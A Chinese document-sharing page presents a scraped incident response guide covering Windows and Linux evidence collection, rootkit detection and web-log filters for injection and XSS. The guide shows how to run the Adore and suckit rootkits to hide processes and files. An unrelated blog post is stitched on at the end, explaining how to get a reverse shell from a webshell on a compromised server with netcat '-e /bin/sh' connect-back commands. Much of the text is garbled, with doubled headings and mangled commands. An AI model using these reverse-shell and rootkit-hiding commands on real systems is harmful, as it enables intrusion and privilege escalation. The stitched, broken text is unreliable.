




已閱讀5頁,還剩74頁未讀, 繼續(xù)免費閱讀
版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
應(yīng)急響應(yīng)技術(shù)指南應(yīng)急響應(yīng)技術(shù)指南 版權(quán)聲明版權(quán)聲明 本文中出現(xiàn)的任何文字?jǐn)⑹?、文檔格式、插圖、照片、方法、過程等內(nèi)容,除另有特別注明,版權(quán)所有, 受到有關(guān)產(chǎn)權(quán)及版權(quán)法保護(hù)。任何個人、機構(gòu)未經(jīng)的書面授權(quán)許可,不得以任何方式復(fù)制或引用本文的任 何片斷。 適用性聲明適用性聲明 本文檔用于描述一般事件的應(yīng)急響應(yīng)流程及技術(shù)手段,供分支工程技術(shù)人員參考使用。 - - 目錄目錄 一. 前期準(zhǔn)備.1 1.1 應(yīng)急流程.1 1.1.1 現(xiàn)場應(yīng)急流程.1 1.1.2 遠(yuǎn)程支持流程.2 1.1.3 應(yīng)急支持接口.3 1.2 應(yīng)急工具包.3 1.2.1 Windows 系統(tǒng)快速信息收集.3 1.2.2 Windows 檢測工具包.6 1.2.3 UNIX/Linux 檢測工具包.7 1.2.4 WEB 檢測工具包.8 二. 技術(shù)指南.9 2.1 WINDOWS檢測技術(shù).9 2.1.1 Windows 常規(guī)檢測.9 2.1.2 Windows 惡意代碼監(jiān)測.14 2.2 UNIX/LINUX檢測技術(shù) .47 2.2.1 UNIX/Linux 常規(guī)檢測.47 2.2.2 UNIX/Linux 惡意代碼監(jiān)測.56 2.3 WEB 檢測技術(shù) .65 2.3.1 WEB 日志分析.65 - 0 - 一一. 前期準(zhǔn)備前期準(zhǔn)備 1.1 應(yīng)急流程應(yīng)急流程 1.1.1 現(xiàn)場應(yīng)急流程現(xiàn)場應(yīng)急流程 - 1 - 1.1.2 遠(yuǎn)程支持流程遠(yuǎn)程支持流程 - 2 - 1.1.3 應(yīng)急支持接口應(yīng)急支持接口 接口部門接口部門 技術(shù)支持部 服務(wù)支持組 接口人接口人 服務(wù)支持組 1.2 應(yīng)急工具包應(yīng)急工具包 1.2.1 Windows 系統(tǒng)快速信息收集系統(tǒng)快速信息收集 在應(yīng)急響應(yīng)過程中,對 Windows 系統(tǒng)的檢查相對較多地依賴于第三方工具,而在沒有 可用第三方檢查工具或由于某些特殊原因而無法在被檢查系統(tǒng)上運行其他工具時,可參考本 節(jié),以便能在借助系統(tǒng)自帶工具的情況下快速收集信息。 系統(tǒng)信息系統(tǒng)信息 開始 程序 附件 系統(tǒng)工具 系統(tǒng)信息(或直接 開始運行 winmsd ) 在系統(tǒng)信息的系統(tǒng)摘要中可獲取基本的系統(tǒng)信息,可通過截圖或保存為 NFO 文件 - 3 - 用戶信息用戶信息 命令行方式:命令行方式:net user,可直接收集用戶信息,若需查看某個用戶的詳細(xì)信息,可使用 命令 net user username 圖形界面:圖形界面:開始 運行 compmgmt.msc 本地用戶和組 用戶 注冊表:注冊表:開始 運行 regedit(Windows 2000 系統(tǒng)需運行 regedt32),打開 HKEY_LOCAL_MACHINESAM,為該項添加權(quán)限(如下圖) 添加權(quán)限完成后按 F5 刷新即可訪問子項。 打開:HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers 在此項下,導(dǎo)出所有以 00000 開頭的項,將所有導(dǎo)出項與 F4(該項對應(yīng) administrator 用戶)導(dǎo)出內(nèi)容做比較,若其中“F”值內(nèi)容相同,則可能為克隆用戶 進(jìn)程、服務(wù)、驅(qū)動信息進(jìn)程、服務(wù)、驅(qū)動信息 進(jìn)程:進(jìn)程:打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 正在運行任務(wù),在此可查看進(jìn)程名及 其對應(yīng)的執(zhí)行文件 - 4 - 服務(wù):服務(wù):打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 服務(wù),在此可查看服務(wù)的啟動情況及 其對應(yīng)的啟動文件 驅(qū)動:驅(qū)動:打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 系統(tǒng)驅(qū)動程序,在此可查看驅(qū)動的啟 動情況及其對應(yīng)的驅(qū)動文件 模塊:模塊:打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 加載的模塊,在此可查看被加載的 DLL 文件及其對應(yīng)的文件路徑 啟動項:啟動項:打開系統(tǒng)信息工具,依次打開 軟件環(huán)境 啟動程序,在此查看啟動程序名及 其對應(yīng)的啟動文件路徑 若需對以上信息進(jìn)行保存,可保存為 NFO 文件,或選擇導(dǎo)出菜單導(dǎo)出為文本文件。 日志與文件日志與文件 查看系統(tǒng)日志:查看系統(tǒng)日志:開始 運行 eventvwr,選擇要查看的日志類型 若需導(dǎo)出系統(tǒng)日志,可右鍵選擇要收集的日志類型,選擇“另存日志文件”,建議導(dǎo)出 為 csv 文件,方便快速統(tǒng)計。 其他程序日志:其他程序日志: IIS 日志:日志:IIS 日志默認(rèn)存儲于%systemroot%system32LogFiles,若被檢測主機為虛 擬主機,為判斷每個虛擬站點對應(yīng)的 IIS 日志,可使用 IIS 管理腳本 findweb.vbs 命令格式為 cscript findweb.vbs test2 輸出結(jié)果如下 Web Site Number = 4 Web Site Description = test2 Hostname = - 5 - Port = 80 IP Address = 由輸出判斷該站點對應(yīng)的日志路徑為 %systemroot%system32LogFilesW3SVC4 Apache 日志:日志:apache for win32 的日志默認(rèn)存儲于其安裝目錄下的 logs 目錄中,其中 access.log 為訪問日志,若該日志不存在或較長時間未出現(xiàn)過更新,則日志路徑可能被修改, 應(yīng)查看 httpd.conf 文件中的下列字段 ErrorLog logs/error.log CustomLog logs/access.log common 根據(jù) CustomLog 字段指定的路徑,可獲取真實的日志文件位置。 網(wǎng)絡(luò)信息網(wǎng)絡(luò)信息 Windows 2000 下可使用 netstat an 命令收集網(wǎng)絡(luò)連接信息。 Windows XP 以后版本中可使用 netstat ano 命令收集網(wǎng)絡(luò)信息。 補丁信息補丁信息 Windows 2000 系統(tǒng)中,收集補丁信息可直接訪問注冊表路徑 HKEY_LOCAL_MACHINESOFTWAREMicrosoftUpdates,該路徑下存儲了系統(tǒng)及 Windows 組件的補丁安裝信息。 Windows XP 以后版本的系統(tǒng)中,可使用 WMIC 命令收集補丁信息,運行命令 wmic qfe 注:為避免輸出過多信息,可使用命令 wmic qfe get Description, HotFixID 或 調(diào)整 cmd 窗口的寬度、高度及高和寬的緩沖區(qū)大小。 1.2.2 Windows 檢測工具包檢測工具包 分類分類命令命令 cross(uid=500)-root for su service 此類提升權(quán)限的信息需要我們引起足夠的重視,很有可能是入侵者留下的痕跡。 (3)cron 日志 cron 指 Unix 允許用戶設(shè)定在某一時間執(zhí)行程序,日志文件默認(rèn)記錄在/var/log/cron 中 - 53 - (4)登錄日志 通過 ssh 登錄的信息,存放在/var/log/secure 中,下面是一個 ssh 暴力破解密碼的日志 記錄 (5)shell 日志 bash 的歷史記錄存放在用戶主目錄下.bash_history 中,用戶所有輸入的命令都會記錄, 如果攻擊者未刪除此日志,就可以仔細(xì)分析并判斷攻擊者的行為,比如:攻擊者得到一個低 權(quán)限用戶,然后編譯漏洞利用程序提升權(quán)限,在這里就可以記錄他輸入的命令。 - 54 - (6)apache 日志 Apache HTTP 服務(wù)器提供了非常全面而靈活的日志記錄功能,利用 Apache 的日志文件 可以反饋出服務(wù)器的訪問信息,錯誤信息等。主要包含 Apache 訪問日志 access_log 和錯誤 日志 error_log 等 以 rpm 方式安裝的 apache 的日志存放在/var/log/httpd 中(如圖),使用源碼安裝的 apache 的日志存放在 apache 安裝目錄 log 文件夾中 SUID 文件文件 SUID 代表 Set User ID, SGID 代表 Set Group ID,當(dāng)一個可執(zhí)行文件被設(shè)置 SUID 時, 任何用戶運行此文件時,都將以文件屬主的權(quán)限執(zhí)行,如圖:passwd 命令被設(shè)置 SUID - 55 - 我們可以使用 find 命令搜索硬盤中所有 SUID 文件,注意觀察搜索結(jié)果,看是否有可疑 文件。 find / -perm - type f print RPM 完整性檢查完整性檢查 在 Linux 系統(tǒng)下可以使用 rpm V 來判斷軟件包中的文件是否被修改,例如: 也可以使用 rpm Va 命令來列出系統(tǒng)中所有發(fā)生過修改的軟件包(包括可執(zhí)行文件、 配置文件等)。 命令將列出校驗失敗的文件,含義如下: S大小改變大小改變 M權(quán)限改變 5MD5 改變 L連接改變 D設(shè)備改變 - 56 - U用戶改變 G組改變 T日期和時間改變 missing文件丟失 網(wǎng)絡(luò)連接網(wǎng)絡(luò)連接 查看系統(tǒng)當(dāng)前開放的端口可以使用命令 netstat anp,列出本機開放的端口,端口對應(yīng) 的進(jìn)程的 PID 值,連接狀態(tài)等信息 使用命令 lsof i 也可以查看系統(tǒng)當(dāng)前開放的端口及端口對應(yīng)的進(jìn)程的 PID 值等信息 - 57 - 2.2.2 UNIX/Linux 惡意代碼監(jiān)測惡意代碼監(jiān)測 本章節(jié)描述了常見惡意代碼檢查工具的使用方法和技巧,同時列舉了常見惡意程序的原 理和分類,不能完整覆蓋全部已知惡意程序。 如需要了解更多的惡意程序查殺實例,請參考常見惡意程序查殺指南。 用戶模式用戶模式 rootkit-lrk5 檢測檢測 LRK5 是一種工作在用戶級(ring3)下的 rootkit,通過替換系統(tǒng)原有文件的方式實現(xiàn)隱 藏功能。 檢測方式主要有兩種: 1、文件完整性工具 Tripwire 需要基準(zhǔn)校驗庫 2、專用 rootkit 檢測工具 Chkrootkit Rootkithunter Rootkit-redstorm 使用檢測使用檢測 1、下載解壓 redstorm 壓縮包 toolkit.gz,使用./install 安裝。 - 58 - 2、安裝后可只用/bin/hate/sk 命令執(zhí)行隱藏等操作。 3、使用 rkhunter c 命令可檢查出系統(tǒng)感染 r3dstorm rootkit。 - 59 - LKM Rootkit-Adore 使用檢測使用檢測 根據(jù)系統(tǒng)的類型,攻擊者有不同的方法來對內(nèi)核進(jìn)行修改,在 N 種 Unix 系統(tǒng)上修改內(nèi) 核最簡單的方法就是利用系統(tǒng)本身的加載的內(nèi)核模塊(LKM)的功能,因此大多數(shù)的內(nèi)核級 Rootkit 通過利用 LKM 動態(tài)地將內(nèi)核更新來提供新功能,新添加的模塊擴展了內(nèi)核,修改了 系統(tǒng)調(diào)用表,同時對內(nèi)核和其他使用內(nèi)核的所有東西有了完全訪問權(quán)。 下面看一個 LKM rootkit 實例-Adore: 編譯運行 adore,configure 后需修改 Makefile 中的 INC 為系統(tǒng)對應(yīng)位置。relink 時選擇 一個 LKM,使用 startadore 運行 adore。 - 60 - - 61 - 使用 adore 隱藏某進(jìn)程,找到 gedit 的 pid 為 2113,使用./ava i 2113 命令隱藏該進(jìn)程, 以下第二個截圖中的 gedit 被隱藏。 - 62 - 使用 adore 隱藏文件 a,執(zhí)行 ava h ./a 后用 ls a 命令無法看到文件 a,執(zhí)行 ava u ./a 后,文件 a 恢復(fù)顯示。 - 63 - 使用 rkhunter -c 命令檢測系統(tǒng),可看到 8 個可疑文件。 - 64 - /dev/kmen rootkit 使用檢測使用檢測 /dev/kmem 包含內(nèi)核自身存儲空間印象,當(dāng)前正在運行的內(nèi)核代碼也位于這部分內(nèi)存空 間中。通過/dev/kmem 修改內(nèi)存中的內(nèi)核,Sd 和 Devik 編寫代碼搜索/dev/kemen,查找系 統(tǒng)調(diào)用表, 例如:SYS_open、SYS_read、SYS_execve 然后通過下面兩個自己實現(xiàn)的函數(shù)來達(dá)到修改系統(tǒng)調(diào)用表的目的,從而實現(xiàn) rootkit 功能。 rkm(read kernel memory)讀取內(nèi)核空間各個有用的項 wkm(write kernel memory)直接向內(nèi)核存儲空間寫入代碼 下面看下/dev/kmen rootkit 實例-suckit 編譯生成可執(zhí)行程序 sk。使用命令./deps,make。 初次使用./sk 或./sk C 命令,配置 suckit,選擇隱藏文件的前綴及根目錄,同時配置密 碼。 - 65 - 運行 sk,輸入密碼后,可使用 sk h pid 隱藏進(jìn)程。 使用工具檢測檢測未發(fā)現(xiàn)明顯異常??梢罁?jù)警告項或無法檢測的項目進(jìn)一步分析。 - 66 - 2.3 WEB 檢測技術(shù)檢測技術(shù) 2.3.1 WEB 日志分析日志分析 IIS 日志日志 .1 IIS 日志路徑日志路徑 IIS 日志默認(rèn)保存在%systemroot%system32LogFiles目錄下 對于虛擬主機,可使用 findweb.vbs 腳本進(jìn)行檢查,詳情參考本文檔 節(jié)。 - 67 - .2 IIS 日志格式定義日志格式定義 注:每條日志記錄的時間均為 GMT 標(biāo)準(zhǔn)時間,計算時間需要 GMT+8 Apache 日志日志 .1 Apache 日志路徑日志路徑 Linux 系統(tǒng)中,apache 的訪問日志默認(rèn)位置為 /var/log/httpd/access.log Windwos 系統(tǒng)中,apache 的訪問日志默認(rèn)位置為 apache 安裝目錄下的 logs 目錄中的 access.log。 若日志不在默認(rèn)路徑,可查看配置文件 httpd.conf 中 CustomLog 字段。 .2 Apache 日志格式定義日志格式定義 52 - - 30/Apr/2009:14:56:00 +0800 GET /index.php HTTP/1.0 200 5172 5230/Apr/2009:14:56:00 +0800 GET /index.php HTTP/1.0 2005172 遠(yuǎn)程遠(yuǎn)程 IP 地址地址訪問時間請求路徑狀態(tài)值傳輸數(shù)據(jù)大小 注: 默認(rèn)配置的 apache 日志只記錄 common 類型,apache 對 common 類型的默認(rèn)定義為 LogFormat %h %l %u %t %r %s %b common,這些信息不足以支撐一般的行為分析, 建議使用 combined 類型,combined 類型的默認(rèn)定義為 LogFormat %h %l %u %t %r %s %b %Refereri %User-Agenti combined (也可以根據(jù)用戶需求自定義)。 啟用方法為:注釋掉默認(rèn)使用的 CustomLog logs/access.log common 將#CustomLog logs/access.log combined 前的注釋符去掉以將其啟用。 重新啟動 apache 或 kill HUP cat /var/run/httpd.pid。 - 68 - WEB 事件分析事件分析 .1 遠(yuǎn)程掃描遠(yuǎn)程掃描 遠(yuǎn)程掃描行為一般通過兩方面進(jìn)行判斷:1、時間連續(xù)性;2、User-Agent 1、時間連續(xù)性 當(dāng) WEB 日志除出現(xiàn)在極短時間內(nèi)的對不同頁面且來自同一 IP 地址的連續(xù)訪問請求, 則可認(rèn)為該 IP 地址對主機發(fā)起掃描。 2、User-Agent 2.1、IIS 日志日志 大部分掃描器在掃描時,會構(gòu)造自己特有的 User-Agent 字段。通過搜索 User- Agent 字段中的特殊值可以判斷掃描行為。 IIS 日志,可使用日志,可使用 logparser 進(jìn)行自動化檢索,命令格式:進(jìn)行自動化檢索,命令格式: logparser -i:iisw3c -o:csv select * into log.csv from ex.log where cs(User-Agent) LIKE %Some-User-Agent-Keyword% 參數(shù)解釋:參數(shù)解釋: -i:iisw3c,-i(input)參數(shù)含義為輸入文件的類型,這里為 IIS 日志,若忽略該參數(shù), 則 logparser 會自動檢查格式 -o:csv,-o(output)定義了輸出格式,這里輸出格式為 CSV,如果忽略該參數(shù), 則在標(biāo)準(zhǔn)輸出上輸出結(jié)果 Select into file.csv from file.log,從 file.log 日志中選擇特定的字段,并將結(jié)果 寫入 file.csv 文件中,如果沒有-o 參數(shù),則此處應(yīng)忽略 into file.csv Select cs(User-Agent) LIKE %keywords%,LIKE 用于實現(xiàn)模糊匹配,如:此 處就實現(xiàn)了對 cs(User-Agent)字段的匹配,檢查該字段中是否包含 keyword。 2.2、Apache 日志(日志(UNIX/Linux) 對于 apache 日志,若想通過 User-Agent 篩選,則需選擇記錄 combined 格式的日 志.。 篩選方式可通過簡單的篩選方式可通過簡單的 grep 進(jìn)行,命令格式:進(jìn)行,命令格式: grep -i Some-User-Agent-Keyword access.log 參數(shù)解釋:參數(shù)解釋: -i:不區(qū)分大小寫 - 69 - .2 注入攻擊注入攻擊 在 WEB 日志中進(jìn)行注入分析時,可通過對請求的關(guān)鍵字進(jìn)行過濾,以檢測可能出現(xiàn)的 注入攻擊。 但在默認(rèn)配置下,IIS 和 Apache 日志均不記錄 POST 數(shù)據(jù)和 COOKIE 內(nèi)容,因此只能 檢測基于 URL 方式的 GET 注入。 1、IIS 日志過濾 logparser -i:iisw3c -o:csv select * into log.csv from ex.log where cs-uri- query LIKE %select% 以上命令對 cs-uri-query 字段進(jìn)行過濾,查找關(guān)鍵字 select 類似的關(guān)鍵字還包括: ;,and,|,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,decl are(使用逗號分隔) 2、Apache 日志過濾 grep -i GET.*.php?.*=.*union.*select.* apache.log 查找形如 GET /xxx.php?id=10 union select .的請求 .3 URL 型跨站腳本型跨站腳本 URL 型跨站大多是由于通過 URL 傳遞參數(shù)到程序后,程序?qū)?shù)未做過濾而直接展示 在頁面上,從而形成跨站。 1、IIS 日志過濾 logparser select * from ex.log where cs-uri-query LIKE %script% 2、Apache 日志過濾 grep -i GET.*.* apache.log .4 錯誤參數(shù)構(gòu)造錯誤參數(shù)構(gòu)造 部分程序在接收參數(shù)時,不但未對參數(shù)進(jìn)行過濾,還未對參數(shù)是否在程序的處理范圍之 內(nèi)也未做檢查,如:一些存在問題的下載程序往往會將下載目標(biāo)文件作為其參數(shù),而在用戶 傳遞下載目標(biāo)文件這一參數(shù)給下載程序時,程序本身不對參數(shù)進(jìn)行嚴(yán)格過濾,因此可能導(dǎo)致 用戶惡意下載一些非授權(quán)文件和源程序。 1、IIS 日志過濾 - 70 - logparser select * from ex.log where cs-uri-stem LI KE %article/show.asp% and cs-uri-query not LIKE %normal% 其中 cs-uri-stem 用于標(biāo)明請求目標(biāo)為 arctile/show.asp 文件,cs-uri-query 為對目標(biāo)頁 面 show.asp 發(fā)出的請求,該語句用于查找所有對 arctile/show.asp 文件發(fā)起的請求字符串中 不包含 normal 字符串的日志。 即,對 arctile/show.asp 的正常請求中,必定包含字符串 normal,當(dāng)惡意用戶進(jìn)行構(gòu)造 時,可能會修改原有的正常字符串 normal。 同理,也可以搜索用戶所關(guān)心的內(nèi)容,如: logparser select * from ex.log where cs-uri-stem LI KE %download.asp% and cs-uri-query LIKE %.asp% 檢查所有對 download.asp 發(fā)起的請求中,是否包含“.asp”。 2、Apache 日志過濾 假設(shè) index.php 接受正常請求格式為:index.php?img=xxxLogoyyy 以下 grep 語句用于過濾所有 index.php 接受 img 參數(shù)的請求,并且將正常請求從其中過 濾,只打印異常請求: grep -i GET.*index.php?img=.* | grep -v -i GET.*.php?.*=.*logo.* 另外,可進(jìn)行如下匹配: grep i “GET.*viewdoc.php?.*type=edit.*HTTP” 搜索對 viewdoc.php 文件發(fā)起的請求中,是否有包含 type=edit 的字符串。 三三. 報告輸出報告輸出 3.1 報告模板報告模板 應(yīng)急響應(yīng)報告模板. doc - 71 - 3.2 報告內(nèi)容報告內(nèi)容 應(yīng)急響應(yīng)報告應(yīng)盡量詳細(xì)的描述整個處理過程,其中包括: 具體的處理操作 如:執(zhí)行哪些命令,使用哪些工具,從這些命令和工具中可以分析出哪些結(jié)果。 操作的時間范圍 為避免操作引起的日志影響分析和意外發(fā)生,應(yīng)記錄每次操作的時間,時間可不必 過于精確,但要記錄下大致時間范圍。 如:15:30-15:40,使用 XX 工具對系統(tǒng)進(jìn)行 XX 操作。 最終處理結(jié)果 每項可能對結(jié)果有直接影響的操作結(jié)果應(yīng)被記錄在報告中。 原因分析 根據(jù)現(xiàn)場分析的結(jié)果,得出引起事件的原因。 安全建議 - Author:zerosoul(零魂) 轉(zhuǎn)載請注明出處,否則就別轉(zhuǎn).(昨天又不小心搜到篇自己以前寫的文章,轉(zhuǎn)了很多地方,沒見一 個寫版權(quán)的) 昨晚(應(yīng)該是今天凌晨)玩了半天朋友給的 Linux 的 WebShell,本來想實踐一下 UDEV 提權(quán)呢,最 后發(fā)現(xiàn)服務(wù)器貌似已經(jīng)打過補丁了。 不過還是有其他的收獲的,所以我就 YY 下 Linux 反彈 shell 的問題。 Linux 提權(quán)絕大部分都靠的是 Local Exploit。WebShell 一般都可以執(zhí)行命令,但是我們的 EXP 必須在可交互環(huán)境運行,否則如果直接在 WebShell 執(zhí)行,即使能提權(quán)成功,我們也沒法利用到。 所以我們需要先反彈一個 CmdLine Shell 回來(直接說成 CmdShell 怕人誤解.因為 Win 有個 cmd.exe _),然后在命令行終端下執(zhí)行 EXP 進(jìn)行提權(quán)。 一般情況下,絕大多數(shù)人都會通過 PHP WebShell 的 Back Connect 功能彈回一個 Shell,但是有 時候會碰到服務(wù)器不支持 PHP 或者 WebShell 沒法反彈的情況,比如這兩天朋友給我的一個 JSPShell 所在服務(wù)器只支持 JSP,不支持 PHP。這時候,我們經(jīng)典的 netcat 就可以派上用場了。 平時在 Windows 下做事的時候,在必要的情況下我們可以先在本機運行 nc -vv -lp 1234 監(jiān)聽端 口,然后在肉雞上 nc 1 1234 -e cmd.exe 給我們反彈一個 CmdShell,這個方法在 Linux 仍然可行。 在本機監(jiān)聽后,在 WebShell 運行 nc 1 1234 -e /bin/sh 就能彈一個 CmdLine Shell 給 - 72 - 我們。 但我們經(jīng)常碰到的情況并不都是這么 100%順利的,像昨晚整的那兩臺,每臺都是不能直接執(zhí)行 nc 的。一臺有 nc,但執(zhí)行從是不起作用,另外一臺直接壓根就沒有 nc. 不過,這個難不倒我們,我們可以給他裝一個嘛,比較快捷的方法是,我們可以到 下載 nc 的源碼,先在我們自己 linux 機器上編譯好以 后把 bin 文件傳上去(我開始傳的我的 Debian 自帶的 netcat,結(jié)果仍然不能運行.)。如果還不行, 那就把源碼傳上去,在目標(biāo)機器上直接編譯。 昨晚那兩臺機器,一臺我是直接傳的本地編譯后的,一臺是在目標(biāo)機器上編譯的。如果直接傳的 nc 可以運行的話還比較好說,如果需要在目標(biāo)機器上編譯的話,這里有點小技巧: 因為在得到 CmdLine Shell 前,我們只能在 WebShell 里執(zhí)行命令,一
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024年音頻切換臺項目資金籌措計劃書代可行性研究報告
- 革命文化資源融入初中歷史教學(xué)探究-以百色市M中學(xué)為例
- 汽車傳感器與檢測技術(shù)電子教案:液位傳感器
- Brand KPIs for neobanking Freetrade in the United Kingdom-英文培訓(xùn)課件2025.4
- 汽車傳感器與檢測技術(shù)電子教案:檢測的作用與意義
- 幾種類型小鼠缺氧實驗報告范本
- 關(guān)+于儒學(xué)的現(xiàn)代轉(zhuǎn)化問題-評現(xiàn)代新儒家的儒學(xué)轉(zhuǎn)化觀
- 介紹學(xué)院特色活動方案
- 物理中考一輪復(fù)習(xí)教案 十五講 摩擦力 二力平衡
- 從江工會相親活動方案
- 【語文】四川省成都市泡桐樹小學(xué)二年級下冊期末復(fù)習(xí)試卷(含答案)
- 配電網(wǎng)技術(shù)標(biāo)準(zhǔn)(施工驗收分冊)
- arm嵌入式系統(tǒng)試題及標(biāo)準(zhǔn)答案
- 麻醉科PDCA持續(xù)改進(jìn)麻醉術(shù)后鎮(zhèn)痛
- 火字旁教學(xué)講解課件
- 租車公司疫情防控應(yīng)急預(yù)案
- 2023-2025年初中學(xué)業(yè)水平考試體育與健康考試體育中考理論考試題庫
- 補繳社保轉(zhuǎn)移需法律文書(社保法律文書怎么寫有效)-靚文網(wǎng)
- SMT失效模式分析PFMEA
- 融媒體中心安全播出管理相關(guān)各項制度
- JJF 1105-2018觸針式表面粗糙度測量儀校準(zhǔn)規(guī)范
評論
0/150
提交評論